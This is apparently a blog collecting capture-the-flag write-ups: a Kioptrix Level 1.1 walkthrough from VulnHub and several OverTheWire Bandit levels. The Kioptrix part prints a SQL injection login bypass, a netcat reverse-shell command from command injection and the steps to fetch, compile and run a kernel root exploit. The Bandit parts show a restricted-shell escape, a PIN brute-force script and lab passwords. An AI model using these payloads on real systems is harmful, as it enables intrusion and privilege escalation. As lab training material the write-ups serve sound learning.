Writeup for Kioptrix Virtual Machines from Vulnhub


I have finally completed the writeup of all 5 Kioptrix Virtual Machines (VMs) from Vulnhub.com, I hope they are helpful to you.

While they are being categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs.

For your convenience, the following are the 5 writeups on Kioptrix machines,


Writeup for Kioptrix: Level 1.1 (#2)

This is a continuation from the Kioptrix Virtual Machines (VM) on VulnHub.

Click to view Writeup for Kioptrix level 1 (#1) VM.


Let’s get started!

Scan the network using nmap to discover hosts
> nmap -sS -T5

Nmap scan report for

Host is up (0.00018s latency).

Not shown: 994 closed ports


22/tcp   open  ssh

80/tcp   open  http

111/tcp  open  rpcbind

443/tcp  open  https

631/tcp  open  ipp

3306/tcp open  mysql

MAC Address: 00:0C:29:A1:02:89 (VMware)

Navigate to the website using a browser (port 80) 


Wow, there is a login page. Let’s test for SQL Injection vulnerability

Enter the following input as the username (take note of the space behind):

‘ or 1=1 — 

And we are in!

lvl-2-002pngNow let’s try the options and see if they works.


Well, it works!

Setup netcat listener on your machine, port 6666
> nc -lvp 6666


Perform netcat connectivity on target machine and spawn a reverse shell (refer to above image); /usr/local/bin/nc 6666 -e /bin/sh

Observe the terminal which you are running the netcat listener

root@kali:~/Desktop/kioptrix# nc -lvp 6666
listening on [any] 6666 … inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 32771
uid=48(apache) gid=48(apache) groups=48(apache)

Now you have a shell as user apache.

Check systme kernel version
> uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Google for vulnerability on “Linux kernel 2.6.9-55”

Check out : CVE-2009-2698, Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

Download the exploit code to your machine
> cd /tmp
> wget ‘https://www.exploit-db.com/download/9542&#8217;

Transfer the exploit code to the target machine
> service apache2 start
> cd /var/www/html/
> mv ~/Desktop/kioptrix/9542.c .

Download the file from target machine
> wget ‘;

=> `9542.c’
Connecting to… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 280.27 MB/s

23:44:28 (280.27 MB/s) – `9542.c’ saved [2645/2645]

The download is a successful.

Compile your exploit on target machine
> gcc 9542.c
> ls


Run your exploit to get root
> ./a.out

sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Congrats, you have gotten root.

OverTheWire: Bandit Level 25 to Level 26

Level goal: Logging in to bandit26 from bandit25 should be fairly easy… The shell for user bandit26 is not /bin/bash, but something else. Find out what it is, how it works and how to break out of it.

Indeed, logging in is easy, simply run the usual command which allow you to login using SSH key instead of login credentials

ssh -i bandit26.sshkey bandit26@localhost


However, after you logged into bandit26, you will be logged out immediately, “Connection to localhost closed.”

As hinted by the question, let’s take a look at the bash used by bandit26,

bandit25@melinda:~$ cat /etc/passwd | grep bandit26
 bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext

Instead of /bin/bash, bandit26 is using /usr/bin/showtext, which is apparently not a shell. Let’s look at the content of the file

bandit25@melinda:~$ cat /usr/bin/showtext
 more ~/text.txt
 exit 0

The way to obtain the password for this level is extremely creative, I salute the team who designed this portion of the challenge, it’s really good.

As we know, we will be logged out immediately after we gain access to the server using the SSH key. The way to get the level 27 password is to gain access to the file before your shell gets terminated.

Think about it, how can that be possibly done? The hint is that you are able to “log in” to the system, just that when it spawns a shell, it terminates the shell immediately – the exact code is “exit 0” as we have see in the showtext “shell”.

Here’s the solution:

First, minimize your terminal so that when you are logged into bandit26 via ssh command, the large “bandit26” ASCII art banner will force a “more” message to prompt you to continue the output. You may refer to the screenshot as an illustraton of how I have minimized my terminal,


ssh -i bandit26.sshkey -t bandit26@localhost cat text.txt


Now that you have forces the terminal to prompt you to continue the display via “more” or “–More–(50%)” in this case, press “v” to enter “vim”, a built-in text editor on Unix machines. You will see the output as per below,


Now, press “:e /etc/bandit_pass/bandit26” to edit the password file of bandit26.


There you go, you have the password to proceed to level 27!!

Let’s review what we have done. We have forces the terminal to display a “more” output, where we can open a VIM text editor and open the password file of bandit26 using the file opening command within the VIM text editor. We are able to open this password file containing the bandit26 password because we have logged into the bandit26 account and this is right before the “exit 0” portion of the code boot us out from the machine.

The password to gain access to the next level is 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z. However, level 27 is not up yet, therefore level 26 is the final bandit challenge as of now.

OverTheWire: Bandit Level 24 to Level 25

Level goal: A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.


The following is my script to perform this brute-forcing techqnies,




while [ $pin -lt 10000 ]; do

echo “Attempting PIN: $pin”

attempt=”$(echo $pass24 $pin | nc localhost 30002)”

if ! [[ $attempt == *”Wrong!”* ]]; then

echo -ne “$attempt”





The script will iterate through each possible PIN to perform brute forcing in identifying the secret pincode of bandit25.


The password to gain access to the next level is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG.

OverTheWire: Bandit Level 23 to Level 24

Level goal: A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

As usual for levels which require us to write, you have to create your own file directory in /tmp and then create a script which output the password file there, and then move it over to the /var/spool/$myname directory



cat /etc/bandit_pass/bandit24 >> /tmp/kongwenbin23/bandit24pass

Important: remember to change the permission of your script before copying it to the /var/spool/bandit24 folder or it will not be run by the bandit24 account. It took me a few tries to notice it.


The scripts in /var/spool/bandit24 will be run once and then purged away every minute.


The password to gain access to the next level is UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ.


Fun fact: you can solve this level using the exact same method as the previous level, must have been a “loophole”…